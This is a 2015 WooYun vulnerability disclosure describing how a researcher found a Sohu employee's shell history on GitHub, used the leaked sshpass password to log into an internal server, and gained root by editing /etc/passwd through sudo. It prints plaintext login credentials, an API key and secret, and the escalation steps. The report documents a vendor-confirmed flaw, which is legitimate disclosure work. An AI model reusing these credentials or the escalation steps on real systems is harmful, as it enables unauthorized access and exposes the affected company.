当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126612

漏洞标题:搜狐某服务器信息泄露已提权(疑似可漫游内网)

相关厂商:搜狐

漏洞作者: 鸟云厂商

提交时间:2015-07-14 06:47

修复时间:2015-08-28 09:56

公开时间:2015-08-28 09:56

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

搜狐某服务器信息泄露可提权(疑似可漫游内网)

详细说明:

翻git玩,翻到个/.zsh_history

https://github.com/effyroth/mac_config/blob/b34c0c50cd681b2a26d02a6a52e91889ced4205e/.zsh_history


sohu的
以下操作记录证明:

: 1397194596:0;cd code.sohuno.com
: 1397194599:0;cd kzapp
: 1397194671:0;cd ~push
: 1397194806:0;~push
: 1397195017:0;z push-server
: 1397195124:0;. .zshrc
: 1397195131:0;. ~/.zshrc
: 1397195156:0;z push
: 1397195183:0;z mygo
: 1397195215:0;z /Users/guzhen/mygo /Users/guzhen/mygo /Users/guzhen/mygo /Users/guzhen/mygo
: 1397195303:0;cd src/code.sohuno.com/kzapp
: 1397195338:0;z /Users/guzhen/mygo/src/code.sohuno.com/kzapp


: 1405057086:0;z /Users/guzhen/work/sohu/kuaizhan/kzproxy


找到sshpass

: 1405058716:0;sshpass -p "$V#C2x1z" scp -P 26622 ./kzweb [email protected]:~/guzhen/


ssh连接之

root@ubuntu:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b7:33:12
inet addr:10.110.19.54 Bcast:10.110.19.55 Mask:255.255.255.252
inet6 addr: fe80::250:56ff:feb7:3312/64 Scope:Link


内网
然后提权(这到底算不算提权?)
cat /etc/passwd 有权限
cat /etc/shadow 没权限
vim /etc/passwd 没权限
sudo vim/passwd 有权限
修改

administrator:x:1000:1000:administrator,,,:/home/administrator:/bin/bash



administrator:x:0:0:administrator,,,:/home/administrator:/bin/bash
保存,断开重新连接。

屏幕快照 2015-07-14 上午3.05.34.png


root@ubuntu:~# ls
guzhen kzappweb.log kzproxy kzproxy.log kzweb.log nohup.out q site
root@ubuntu:~# cd guzhen
root@ubuntu:~/guzhen# ls
killscp.sh kzproxy kzproxy.log kzweb README.md site start.sh stop.sh
root@ubuntu:~/guzhen# cat start.sh
nohup /home/administrator/guzhen/kzweb -bind=:80 --key=1357160869 --secret=ecd3c 2de9bcd0862e27c8bc993951b7b --kuaizhanHost=www.kuaizhan.com 2>&1 >/home/administ rator/guzhen/kzproxy.log &
root@ubuntu:~/guzhen#


貌似是搜狐快站的某台服务器

漏洞证明:

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-14 09:55

厂商回复:

感谢你对搜狐安全的支持。

最新状态:

暂无